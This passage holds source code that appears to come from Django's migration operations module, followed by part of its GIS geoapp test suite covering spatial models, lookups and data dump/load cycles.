]
elif isinstance(operation, AlterField):
return [
CreateModel(
self.name,
fields=[
(n, operation.field if n == operation.name else v)
for n, v in self.fields
],
options=self.options,
bases=self.bases,
managers=self.managers,
),
]
elif isinstance(operation, RemoveField):
options = self.options.copy()
for option_name in ("unique_together", "index_together"):
option = options.pop(option_name, None)
if option:
option = set(
filter(
bool,
(
tuple(
f for f in fields if f != operation.name_lower
)
for fields in option
),
)
)
if option:
options[option_name] = option
order_with_respect_to = options.get("order_with_respect_to")
if order_with_respect_to == operation.name_lower:
del options["order_with_respect_to"]
return [
CreateModel(
self.name,
fields=[
(n, v)
for n, v in self.fields
if n.lower() != operation.name_lower
],
options=options,
bases=self.bases,
managers=self.managers,
),
]
elif isinstance(operation, RenameField):
options = self.options.copy()
for option_name in ("unique_together", "index_together"):
option = options.get(option_name)
if option:
options[option_name] = {
tuple(
operation.new_name if f == operation.old_name else f
for f in fields
)
for fields in option
}
order_with_respect_to = options.get("order_with_respect_to")
if order_with_respect_to == operation.old_name:
options["order_with_respect_to"] = operation.new_name
return [
CreateModel(
self.name,
fields=[
(operation.new_name if n == operation.old_name else n, v)
for n, v in self.fields
],
options=options,
bases=self.bases,
managers=self.managers,
),
]
return super().reduce(operation, app_label)
class DeleteModel(ModelOperation):
"""Drop a model's table."""
def deconstruct(self):
kwargs = {
"name": self.name,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.remove_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.delete_model(model)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.create_model(model)
def references_model(self, name, app_label):
# The deleted model could be referencing the specified model through
# related fields.
return True
def describe(self):
return "Delete model %s" % self.name
@property
def migration_name_fragment(self):
return "delete_%s" % self.name_lower
class RenameModel(ModelOperation):
"""Rename a model."""
def __init__(self, old_name, new_name):
self.old_name = old_name
self.new_name = new_name
super().__init__(old_name)
@cached_property
def old_name_lower(self):
return self.old_name.lower()
@cached_property
def new_name_lower(self):
return self.new_name.lower()
def deconstruct(self):
kwargs = {
"old_name": self.old_name,
"new_name": self.new_name,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.rename_model(app_label, self.old_name, self.new_name)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.new_name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.old_name)
old_db_table = old_model._meta.db_table
new_db_table = new_model._meta.db_table
# Don't alter when a table name is not changed.
if old_db_table == new_db_table:
return
# Move the main table
schema_editor.alter_db_table(new_model, old_db_table, new_db_table)
# Alter the fields pointing to us
for related_object in old_model._meta.related_objects:
if related_object.related_model == old_model:
model = new_model
related_key = (app_label, self.new_name_lower)
else:
model = related_object.related_model
related_key = (
related_object.related_model._meta.app_label,
related_object.related_model._meta.model_name,
)
to_field = to_state.apps.get_model(*related_key)._meta.get_field(
related_object.field.name
)
schema_editor.alter_field(
model,
related_object.field,
to_field,
)
# Rename M2M fields whose name is based on this model's name.
fields = zip(
old_model._meta.local_many_to_many, new_model._meta.local_many_to_many
)
for (old_field, new_field) in fields:
# Skip self-referential fields as these are renamed above.
if (
new_field.model == new_field.related_model
or not new_field.remote_field.through._meta.auto_created
):
continue
# Rename the M2M table that's based on this model's name.
old_m2m_model = old_field.remote_field.through
new_m2m_model = new_field.remote_field.through
schema_editor.alter_db_table(
new_m2m_model,
old_m2m_model._meta.db_table,
new_m2m_model._meta.db_table,
)
# Rename the column in the M2M table that's based on this
# model's name.
schema_editor.alter_field(
new_m2m_model,
old_m2m_model._meta.get_field(old_model._meta.model_name),
new_m2m_model._meta.get_field(new_model._meta.model_name),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
self.new_name_lower, self.old_name_lower = (
self.old_name_lower,
self.new_name_lower,
)
self.new_name, self.old_name = self.old_name, self.new_name
self.database_forwards(app_label, schema_editor, from_state, to_state)
self.new_name_lower, self.old_name_lower = (
self.old_name_lower,
self.new_name_lower,
)
self.new_name, self.old_name = self.old_name, self.new_name
def references_model(self, name, app_label):
return (
name.lower() == self.old_name_lower or name.lower() == self.new_name_lower
)
def describe(self):
return "Rename model %s to %s" % (self.old_name, self.new_name)
@property
def migration_name_fragment(self):
return "rename_%s_%s" % (self.old_name_lower, self.new_name_lower)
def reduce(self, operation, app_label):
if (
isinstance(operation, RenameModel)
and self.new_name_lower == operation.old_name_lower
):
return [
RenameModel(
self.old_name,
operation.new_name,
),
]
# Skip `ModelOperation.reduce` as we want to run `references_model`
# against self.new_name.
return super(ModelOperation, self).reduce(
operation, app_label
) or not operation.references_model(self.new_name, app_label)
class ModelOptionOperation(ModelOperation):
def reduce(self, operation, app_label):
if (
isinstance(operation, (self.__class__, DeleteModel))
and self.name_lower == operation.name_lower
):
return [operation]
return super().reduce(operation, app_label)
class AlterModelTable(ModelOptionOperation):
"""Rename a model's table."""
def __init__(self, name, table):
self.table = table
super().__init__(name)
def deconstruct(self):
kwargs = {
"name": self.name,
"table": self.table,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.alter_model_options(app_label, self.name_lower, {"db_table": self.table})
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
# Rename M2M fields whose name is based on this model's db_table
for (old_field, new_field) in zip(
old_model._meta.local_many_to_many, new_model._meta.local_many_to_many
):
if new_field.remote_field.through._meta.auto_created:
schema_editor.alter_db_table(
new_field.remote_field.through,
old_field.remote_field.through._meta.db_table,
new_field.remote_field.through._meta.db_table,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def describe(self):
return "Rename table for %s to %s" % (
self.name,
self.table if self.table is not None else "(default)",
)
@property
def migration_name_fragment(self):
return "alter_%s_table" % self.name_lower
class AlterTogetherOptionOperation(ModelOptionOperation):
option_name = None
def __init__(self, name, option_value):
if option_value:
option_value = set(normalize_together(option_value))
setattr(self, self.option_name, option_value)
super().__init__(name)
@cached_property
def option_value(self):
return getattr(self, self.option_name)
def deconstruct(self):
kwargs = {
"name": self.name,
self.option_name: self.option_value,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.alter_model_options(
app_label,
self.name_lower,
{self.option_name: self.option_value},
)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
alter_together = getattr(schema_editor, "alter_%s" % self.option_name)
alter_together(
new_model,
getattr(old_model._meta, self.option_name, set()),
getattr(new_model._meta, self.option_name, set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_field(self, model_name, name, app_label):
return self.references_model(model_name, app_label) and (
not self.option_value
or any((name in fields) for fields in self.option_value)
)
def describe(self):
return "Alter %s for %s (%s constraint(s))" % (
self.option_name,
self.name,
len(self.option_value or ""),
)
@property
def migration_name_fragment(self):
return "alter_%s_%s" % (self.name_lower, self.option_name)
def can_reduce_through(self, operation, app_label):
return super().can_reduce_through(operation, app_label) or (
isinstance(operation, AlterTogetherOptionOperation)
and type(operation) is not type(self)
)
class AlterUniqueTogether(AlterTogetherOptionOperation):
"""
Change the value of unique_together to the target one.
Input value of unique_together must be a set of tuples.
"""
option_name = "unique_together"
def __init__(self, name, unique_together):
super().__init__(name, unique_together)
class AlterIndexTogether(AlterTogetherOptionOperation):
"""
Change the value of index_together to the target one.
Input value of index_together must be a set of tuples.
"""
option_name = "index_together"
def __init__(self, name, index_together):
super().__init__(name, index_together)
class AlterOrderWithRespectTo(ModelOptionOperation):
"""Represent a change with the order_with_respect_to option."""
option_name = "order_with_respect_to"
def __init__(self, name, order_with_respect_to):
self.order_with_respect_to = order_with_respect_to
super().__init__(name)
def deconstruct(self):
kwargs = {
"name": self.name,
"order_with_respect_to": self.order_with_respect_to,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.alter_model_options(
app_label,
self.name_lower,
{self.option_name: self.order_with_respect_to},
)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
to_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, to_model):
from_model = from_state.apps.get_model(app_label, self.name)
# Remove a field if we need to
if (
from_model._meta.order_with_respect_to
and not to_model._meta.order_with_respect_to
):
schema_editor.remove_field(
from_model, from_model._meta.get_field("_order")
)
# Add a field if we need to (altering the column is untouched as
# it's likely a rename)
elif (
to_model._meta.order_with_respect_to
and not from_model._meta.order_with_respect_to
):
field = to_model._meta.get_field("_order")
if not field.has_default():
field.default = 0
schema_editor.add_field(
from_model,
field,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_field(self, model_name, name, app_label):
return self.references_model(model_name, app_label) and (
self.order_with_respect_to is None or name == self.order_with_respect_to
)
def describe(self):
return "Set order_with_respect_to on %s to %s" % (
self.name,
self.order_with_respect_to,
)
@property
def migration_name_fragment(self):
return "alter_%s_order_with_respect_to" % self.name_lower
class AlterModelOptions(ModelOptionOperation):
"""
Set new model options that don't directly affect the database schema
(like verbose_name, permissions, ordering). Python code in migrations
may still need them.
"""
# Model options we want to compare and preserve in an AlterModelOptions op
ALTER_OPTION_KEYS = [
"base_manager_name",
"default_manager_name",
"default_related_name",
"get_latest_by",
"managed",
"ordering",
"permissions",
"default_permissions",
"select_on_save",
"verbose_name",
"verbose_name_plural",
]
def __init__(self, name, options):
self.options = options
super().__init__(name)
def deconstruct(self):
kwargs = {
"name": self.name,
"options": self.options,
}
return (self.__class__.__qualname__, [], kwargs)
def state_forwards(self, app_label, state):
state.alter_model_options(
app_label,
self.name_lower,
self.options,
self.ALTER_OPTION_KEYS,
)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
pass
def database_backwards(self, app_label, schema_editor, from_state, to_state):
pass
def describe(self):
return "Change Meta options on %s" % self.name
@property
def migration_name_fragment(self):
return "alter_%s_options" % self.name_lower
class AlterModelManagers(ModelOptionOperation):
"""Alter the model's managers."""
serialization_expand_args = ["managers"]
def __init__(self, name, managers):
self.managers = managers
super().__init__(name)
def deconstruct(self):
return (self.__class__.__qualname__, [self.name, self.managers], {})
def state_forwards(self, app_label, state):
state.alter_model_managers(app_label, self.name_lower, self.managers)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
pass
def database_backwards(self, app_label, schema_editor, from_state, to_state):
pass
def describe(self):
return "Change managers on %s" % self.name
@property
def migration_name_fragment(self):
return "alter_%s_managers" % self.name_lower
class IndexOperation(Operation):
option_name = "indexes"
@cached_property
def model_name_lower(self):
return self.model_name.lower()
class AddIndex(IndexOperation):
"""Add an index on a model."""
def __init__(self, model_name, index):
self.model_name = model_name
if not index.name:
raise ValueError(
"Indexes passed to AddIndex operations require a name "
"argument. %r doesn't have one." % index
)
self.index = index
def state_forwards(self, app_label, state):
state.add_index(app_label, self.model_name_lower, self.index)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.add_index(model, self.index)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.remove_index(model, self.index)
def deconstruct(self):
kwargs = {
"model_name": self.model_name,
"index": self.index,
}
return (
self.__class__.__qualname__,
[],
kwargs,
)
def describe(self):
if self.index.expressions:
return "Create index %s on %s on model %s" % (
self.index.name,
", ".join([str(expression) for expression in self.index.expressions]),
self.model_name,
)
return "Create index %s on field(s) %s of model %s" % (
self.index.name,
", ".join(self.index.fields),
self.model_name,
)
@property
def migration_name_fragment(self):
return "%s_%s" % (self.model_name_lower, self.index.name.lower())
class RemoveIndex(IndexOperation):
"""Remove an index from a model."""
def __init__(self, model_name, name):
self.model_name = model_name
self.name = name
def state_forwards(self, app_label, state):
state.remove_index(app_label, self.model_name_lower, self.name)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
from_model_state = from_state.models[app_label, self.model_name_lower]
index = from_model_state.get_index_by_name(self.name)
schema_editor.remove_index(model, index)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
to_model_state = to_state.models[app_label, self.model_name_lower]
index = to_model_state.get_index_by_name(self.name)
schema_editor.add_index(model, index)
def deconstruct(self):
kwargs = {
"model_name": self.model_name,
"name": self.name,
}
return (
self.__class__.__qualname__,
[],
kwargs,
)
def describe(self):
return "Remove index %s from %s" % (self.name, self.model_name)
@property
def migration_name_fragment(self):
return "remove_%s_%s" % (self.model_name_lower, self.name.lower())
class AddConstraint(IndexOperation):
option_name = "constraints"
def __init__(self, model_name, constraint):
self.model_name = model_name
self.constraint = constraint
def state_forwards(self, app_label, state):
state.add_constraint(app_label, self.model_name_lower, self.constraint)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.add_constraint(model, self.constraint)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.remove_constraint(model, self.constraint)
def deconstruct(self):
return (
self.__class__.__name__,
[],
{
"model_name": self.model_name,
"constraint": self.constraint,
},
)
def describe(self):
return "Create constraint %s on model %s" % (
self.constraint.name,
self.model_name,
)
@property
def migration_name_fragment(self):
return "%s_%s" % (self.model_name_lower, self.constraint.name.lower())
class RemoveConstraint(IndexOperation):
option_name = "constraints"
def __init__(self, model_name, name):
self.model_name = model_name
self.name = name
def state_forwards(self, app_label, state):
state.remove_constraint(app_label, self.model_name_lower, self.name)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
from_model_state = from_state.models[app_label, self.model_name_lower]
constraint = from_model_state.get_constraint_by_name(self.name)
schema_editor.remove_constraint(model, constraint)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
to_model_state = to_state.models[app_label, self.model_name_lower]
constraint = to_model_state.get_constraint_by_name(self.name)
schema_editor.add_constraint(model, constraint)
def deconstruct(self):
return (
self.__class__.__name__,
[],
{
"model_name": self.model_name,
"name": self.name,
},
)
def describe(self):
return "Remove constraint %s from model %s" % (self.name, self.model_name)
@property
def migration_name_fragment(self):
return "remove_%s_%s" % (self.model_name_lower, self.name.lower())
```
#### File: gis_tests/geoapp/tests.py
```python
import tempfile
from io import StringIO
from django.contrib.gis import gdal
from django.contrib.gis.db.models import Extent, MakeLine, Union, functions
from django.contrib.gis.geos import (
GeometryCollection,
GEOSGeometry,
LinearRing,
LineString,
MultiLineString,
MultiPoint,
MultiPolygon,
Point,
Polygon,
fromstr,
)
from django.core.management import call_command
from django.db import DatabaseError, NotSupportedError, connection
from django.db.models import F, OuterRef, Subquery
from django.test import TestCase, skipUnlessDBFeature
from django.test.utils import CaptureQueriesContext
from ..utils import skipUnlessGISLookup
from .models import (
City,
Country,
Feature,
MinusOneSRID,
MultiFields,
NonConcreteModel,
PennsylvaniaCity,
State,
Track,
)
class GeoModelTest(TestCase):
fixtures = ["initial"]
def test_fixtures(self):
"Testing geographic model initialization from fixtures."
# Ensuring that data was loaded from initial data fixtures.
self.assertEqual(2, Country.objects.count())
self.assertEqual(8, City.objects.count())
self.assertEqual(2, State.objects.count())
def test_proxy(self):
"Testing Lazy-Geometry support (using the GeometryProxy)."
# Testing on a Point
pnt = Point(0, 0)
nullcity = City(name="NullCity", point=pnt)
nullcity.save()
# Making sure TypeError is thrown when trying to set with an
# incompatible type.
for bad in [5, 2.0, LineString((0, 0), (1, 1))]:
with self.assertRaisesMessage(TypeError, "Cannot set"):
nullcity.point = bad
# Now setting with a compatible GEOS Geometry, saving, and ensuring
# the save took, notice no SRID is explicitly set.
new = Point(5, 23)
nullcity.point = new
# Ensuring that the SRID is automatically set to that of the
# field after assignment, but before saving.
self.assertEqual(4326, nullcity.point.srid)
nullcity.save()
# Ensuring the point was saved correctly after saving
self.assertEqual(new, City.objects.get(name="NullCity").point)
# Setting the X and Y of the Point
nullcity.point.x = 23
nullcity.point.y = 5
# Checking assignments pre & post-save.
self.assertNotEqual(
Point(23, 5, srid=4326), City.objects.get(name="NullCity").point
)
nullcity.save()
self.assertEqual(
Point(23, 5, srid=4326), City.objects.get(name="NullCity").point
)
nullcity.delete()
# Testing on a Polygon
shell = LinearRing((0, 0), (0, 90), (100, 90), (100, 0), (0, 0))
inner = LinearRing((40, 40), (40, 60), (60, 60), (60, 40), (40, 40))
# Creating a State object using a built Polygon
ply = Polygon(shell, inner)
nullstate = State(name="NullState", poly=ply)
self.assertEqual(4326, nullstate.poly.srid) # SRID auto-set from None
nullstate.save()
ns = State.objects.get(name="NullState")
self.assertEqual(connection.ops.Adapter._fix_polygon(ply), ns.poly)
# Testing the `ogr` and `srs` lazy-geometry properties.
self.assertIsInstance(ns.poly.ogr, gdal.OGRGeometry)
self.assertEqual(ns.poly.wkb, ns.poly.ogr.wkb)
self.assertIsInstance(ns.poly.srs, gdal.SpatialReference)
self.assertEqual("WGS 84", ns.poly.srs.name)
# Changing the interior ring on the poly attribute.
new_inner = LinearRing((30, 30), (30, 70), (70, 70), (70, 30), (30, 30))
ns.poly[1] = new_inner
ply[1] = new_inner
self.assertEqual(4326, ns.poly.srid)
ns.save()
self.assertEqual(
connection.ops.Adapter._fix_polygon(ply),
State.objects.get(name="NullState").poly,
)
ns.delete()
@skipUnlessDBFeature("supports_transform")
def test_lookup_insert_transform(self):
"Testing automatic transform for lookups and inserts."
# San Antonio in 'WGS84' (SRID 4326)
sa_4326 = "POINT (-98.493183 29.424170)"
wgs_pnt = fromstr(sa_4326, srid=4326) # Our reference point in WGS84
# San Antonio in 'WGS 84 / Pseudo-Mercator' (SRID 3857)
other_srid_pnt = wgs_pnt.transform(3857, clone=True)
# Constructing & querying with a point from a different SRID. Oracle
# `SDO_OVERLAPBDYINTERSECT` operates differently from
# `ST_Intersects`, so contains is used instead.
if connection.ops.oracle:
tx = Country.objects.get(mpoly__contains=other_srid_pnt)
else:
tx = Country.objects.get(mpoly__intersects=other_srid_pnt)
self.assertEqual("Texas", tx.name)
# Creating San Antonio. Remember the Alamo.
sa = City.objects.create(name="San Antonio", point=other_srid_pnt)
# Now verifying that San Antonio was transformed correctly
sa = City.objects.get(name="San Antonio")
self.assertAlmostEqual(wgs_pnt.x, sa.point.x, 6)
self.assertAlmostEqual(wgs_pnt.y, sa.point.y, 6)
# If the GeometryField SRID is -1, then we shouldn't perform any
# transformation if the SRID of the input geometry is different.
m1 = MinusOneSRID(geom=Point(17, 23, srid=4326))
m1.save()
self.assertEqual(-1, m1.geom.srid)
def test_createnull(self):
"Testing creating a model instance and the geometry being None"
c = City()
self.assertIsNone(c.point)
def test_geometryfield(self):
"Testing the general GeometryField."
Feature(name="Point", geom=Point(1, 1)).save()
Feature(name="LineString", geom=LineString((0, 0), (1, 1), (5, 5))).save()
Feature(
name="Polygon",
geom=Polygon(LinearRing((0, 0), (0, 5), (5, 5), (5, 0), (0, 0))),
).save()
Feature(
name="GeometryCollection",
geom=GeometryCollection(
Point(2, 2),
LineString((0, 0), (2, 2)),
Polygon(LinearRing((0, 0), (0, 5), (5, 5), (5, 0), (0, 0))),
),
).save()
f_1 = Feature.objects.get(name="Point")
self.assertIsInstance(f_1.geom, Point)
self.assertEqual((1.0, 1.0), f_1.geom.tuple)
f_2 = Feature.objects.get(name="LineString")
self.assertIsInstance(f_2.geom, LineString)
self.assertEqual(((0.0, 0.0), (1.0, 1.0), (5.0, 5.0)), f_2.geom.tuple)
f_3 = Feature.objects.get(name="Polygon")
self.assertIsInstance(f_3.geom, Polygon)
f_4 = Feature.objects.get(name="GeometryCollection")
self.assertIsInstance(f_4.geom, GeometryCollection)
self.assertEqual(f_3.geom, f_4.geom[2])
@skipUnlessDBFeature("supports_transform")
def test_inherited_geofields(self):
"Database functions on inherited Geometry fields."
# Creating a Pennsylvanian city.
PennsylvaniaCity.objects.create(
name="Mansfield", county="Tioga", point="POINT(-77.071445 41.823881)"
)
# All transformation SQL will need to be performed on the
# _parent_ table.
qs = PennsylvaniaCity.objects.annotate(
new_point=functions.Transform("point", srid=32128)
)
self.assertEqual(1, qs.count())
for pc in qs:
self.assertEqual(32128, pc.new_point.srid)
def test_raw_sql_query(self):
"Testing raw SQL query."
cities1 = City.objects.all()
point_select = connection.ops.select % "point"
cities2 = list(
City.objects.raw(
"select id, name, %s as point from geoapp_city" % point_select
)
)
self.assertEqual(len(cities1), len(cities2))
with self.assertNumQueries(0): # Ensure point isn't deferred.
self.assertIsInstance(cities2[0].point, Point)
def test_dumpdata_loaddata_cycle(self):
"""
Test a dumpdata/loaddata cycle with geographic data.
"""
out = StringIO()
original_data = list(City.objects.order_by("name"))
call_command("dumpdata", "geoapp.City", stdout=out)
result = out.getvalue()
houston = City.objects.get(name="Houston")
self.assertIn('"point": "%s"' % houston.point.ewkt, result)
# Reload now dumped data
with tempfile.NamedTemporaryFile(mode="w", suffix=".json") as tmp:
tmp.write(result)
tmp.seek(0)
call_command("loaddata", tmp.name, verbosity=0)
self.assertEqual(original_data, list(City.objects.order_by("name")))
@skipUnlessDBFeature("supports_empty_geometries")
def test_empty_geometries(self):
geometry_classes = [
Point,
LineString,
LinearRing,
Polygon,
MultiPoint,
MultiLineString,
MultiPolygon,
GeometryCollection,
]
for klass in geometry_classes:
g = klass(srid=4326)
feature = Feature.objects.create(name="Empty %s" % klass.__name__, geom=g)
feature.refresh_from_db()
if klass is LinearRing:
# LinearRing isn't representable in WKB, so GEOSGeomtry.wkb
# uses LineString instead.
g = LineString(srid=4326)
self.assertEqual(feature.geom, g)
self.assertEqual(feature.geom.srid, g.srid)
class GeoLookupTest(TestCase):
fixtures = ["initial"]
def test_disjoint_lookup(self):
"Testing the `disjoint` lookup type."
ptown = City.objects.get(name="Pueblo")
qs1 = City.objects.filter(point__disjoint=ptown.point)
self.assertEqual(7, qs1.count())
qs2 = State.objects.filter(poly__disjoint=ptown.point)
self.assertEqual(1, qs2.count())
self.assertEqual("Kansas", qs2[0].name)
def test_contains_contained_lookups(self):
"Testing the 'contained', 'contains', and 'bbcontains' lookup types."
# Getting Texas, yes we were a country -- once ;)
texas = Country.objects.get(name="Texas")
# Seeing what cities are in Texas, should get Houston and Dallas,
# and Oklahoma City because 'contained' only checks on the
# _bounding box_ of the Geometries.
if connection.features.supports_contained_lookup:
qs = City.objects.filter(point__contained=texas.mpoly)
self.assertEqual(3, qs.count())
cities = ["Houston", "Dallas", "Oklahoma City"]
for c in qs:
self.assertIn(c.name, cities)
# Pulling out some cities.
houston = City.objects.get(name="Houston")
wellington = City.objects.get(name="Wellington")
pueblo = City.objects.get(name="Pueblo")
okcity = City.objects.get(name="Oklahoma City")
lawrence = City.objects.get(name="Lawrence")
# Now testing contains on the countries using the points for
# Houston and Wellington.
tx = Country.objects.get(mpoly__contains=houston.point) # Query w/GEOSGeometry
nz = Country.objects.get(
mpoly__contains=wellington.point.hex
) # Query w/EWKBHEX
self.assertEqual("Texas", tx.name)
self.assertEqual("New Zealand", nz.name)
# Testing `contains` on the states using the point for Lawrence.
ks = State.objects.get(poly__contains=lawrence.point)
self.assertEqual("Kansas", ks.name)
# Pueblo and Oklahoma City (even though OK City is within the bounding
# box of Texas) are not contained in Texas or New Zealand.
self.assertEqual(
len(Country.objects.filter(mpoly__contains=pueblo.point)), 0
) # Query w/GEOSGeometry object
self.assertEqual(
len(Country.objects.filter(mpoly__contains=okcity.point.wkt)), 0
) # Query w/WKT
# OK City is contained w/in bounding box of Texas.
if connection.features.supports_bbcontains_lookup:
qs = Country.objects.filter(mpoly__bbcontains=okcity.point)
self.assertEqual(1, len(qs))
self.assertEqual("Texas", qs[0].name)
@skipUnlessDBFeature("supports_crosses_lookup")
def test_crosses_lookup(self):
Track.objects.create(name="Line1", line=LineString([(-95, 29), (-60, 0)]))
self.assertEqual(
Track.objects.filter(
line__crosses=LineString([(-95, 0), (-60, 29)])
).count(),
1,
)
self.assertEqual(
Track.objects.filter(
line__crosses=LineString([(-95, 30), (0, 30)])
).count(),
0,
)
@skipUnlessDBFeature("supports_isvalid_lookup")
def test_isvalid_lookup(self):
invalid_geom = fromstr("POLYGON((0 0, 0 1, 1 1, 1 0, 1 1, 1 0, 0 0))")
State.objects.create(name="invalid", poly=invalid_geom)
qs = State.objects.all()
if connection.ops.oracle or (
connection.ops.mysql and connection.mysql_version < (8, 0, 0)
):
# Kansas has adjacent vertices with distance 6.99244813842e-12
# which is smaller than the default Oracle tolerance.
# It's invalid on MySQL < 8 also.
qs = qs.exclude(name="Kansas")
self.assertEqual(
State.objects.filter(name="Kansas", poly__isvalid=False).count(), 1
)
self.assertEqual(qs.filter(poly__isvalid=False).count(), 1)
self.assertEqual(qs.filter(poly__isvalid=True).count(), qs.count() - 1)
@skipUnlessGISLookup("left", "right")
def test_left_right_lookups(self):
"Testing the 'left' and 'right' lookup types."
# Left: A << B => true if xmax(A) < xmin(B)
# Right: A >> B => true if xmin(A) > xmax(B)
# See: BOX2D_left() and BOX2D_right() in lwgeom_box2dfloat4.c in PostGIS source.
# Getting the borders for Colorado & Kansas
co_border = State.objects.get(name="Colorado").poly
ks_border = State.objects.get(name="Kansas").poly
# Note: Wellington has an 'X' value of 174, so it will not be considered
# to the left of CO.
# These cities should be strictly to the right of the CO border.
cities = [
"Houston",
"Dallas",
"Oklahoma City",
"Lawrence",
"Chicago",
"Wellington",
]
qs = City.objects.filter(point__right=co_border)
self.assertEqual(6, len(qs))
for c in qs:
self.assertIn(c.name, cities)
# These cities should be strictly to the right of the KS border.
cities = ["Chicago", "Wellington"]
qs = City.objects.filter(point__right=ks_border)
self.assertEqual(2, len(qs))
for c in qs:
self.assertIn(c.name, cities)
# Note: Wellington has an 'X' value of 174, so it will not be considered
# to the left of CO.
vic = City.objects.get(point__left=co_border)
self.assertEqual("Victoria", vic.name)
cities = ["Pueblo", "Victoria"]
qs = City.objects.filter(point__left=ks_border)
self.assertEqual(2, len(qs))
for c in qs:
self.assertIn(c.name, cities)
@skipUnlessGISLookup("strictly_above", "strictly_below")
def test_strictly_above_below_lookups(self):
dallas = City.objects.get(name="Dallas")
self.assertQuerysetEqual(
City.objects.filter(point__strictly_above=dallas.point).order_by("name"),
["Chicago", "Lawrence", "Oklahoma City", "Pueblo", "Victoria"],
lambda b: b.name,
)
self.assertQuerysetEqual(
City.objects.filter(point__strictly_below=dallas.point).order_by("name"),
["Houston", "Wellington"],
lambda b: b.name,
)
def test_equals_lookups(self):
"Testing the 'same_as' and 'equals' lookup types."
pnt = fromstr("POINT (-95.363151 29.763374)", srid=4326)
c1 = City.objects.get(point=pnt)
c2 = City.objects.get(point__same_as=pnt)
c3 = City.objects.get(point__equals=pnt)
for c in [c1, c2, c3]:
self.assertEqual("Houston", c.name)
@skipUnlessDBFeature("supports_null_geometries")
def test_null_geometries(self):
"Testing NULL geometry support, and the `isnull` lookup type."
# Creating a state with a NULL boundary.
State.objects.create(name="Puerto Rico")
# Querying for both NULL and Non-NULL values.
nullqs = State.objects.filter(poly__isnull=True)
validqs = State.objects.filter(poly__isnull=False)
# Puerto Rico should be NULL (it's a commonwealth unincorporated territory)
self.assertEqual(1, len(nullqs))
self.assertEqual("Puerto Rico", nullqs[0].name)
# GeometryField=None is an alias for __isnull=True.
self.assertCountEqual(State.objects.filter(poly=None), nullqs)
self.assertCountEqual(State.objects.exclude(poly=None), validqs)
# The valid states should be Colorado & Kansas
self.assertEqual(2, len(validqs))
state_names = [s.name for s in validqs]
self.assertIn("Colorado", state_names)
self.assertIn("Kansas", state_names)
# Saving another commonwealth w/a NULL geometry.
nmi = State.objects.create(name="Northern Mariana Islands", poly=None)
self.assertIsNone(nmi.poly)
# Assigning a geometry and saving -- then UPDATE back to NULL.
nmi.poly = "POLYGON((0 0,1 0,1 1,1 0,0 0))"
nmi.save()
State.objects.filter(name="Northern Mariana Islands").update(poly=None)
self.assertIsNone(State.objects.get(name="Northern Mariana Islands").poly)
@skipUnlessDBFeature(
"supports_null_geometries", "supports_crosses_lookup", "supports_relate_lookup"
)
def test_null_geometries_excluded_in_lookups(self):
"""NULL features are excluded in spatial lookup functions."""
null = State.objects.create(name="NULL", poly=None)
queries = [
("equals", Point(1, 1)),
("disjoint", Point(1, 1)),
("touches", Point(1, 1)),
("crosses", LineString((0, 0), (1, 1), (5, 5))),
("within", Point(1, 1)),
("overlaps", LineString((0, 0), (1, 1), (5, 5))),
("contains", LineString((0, 0), (1, 1), (5, 5))),
("intersects", LineString((0, 0), (1, 1), (5, 5))),
("relate", (Point(1, 1), "T*T***FF*")),
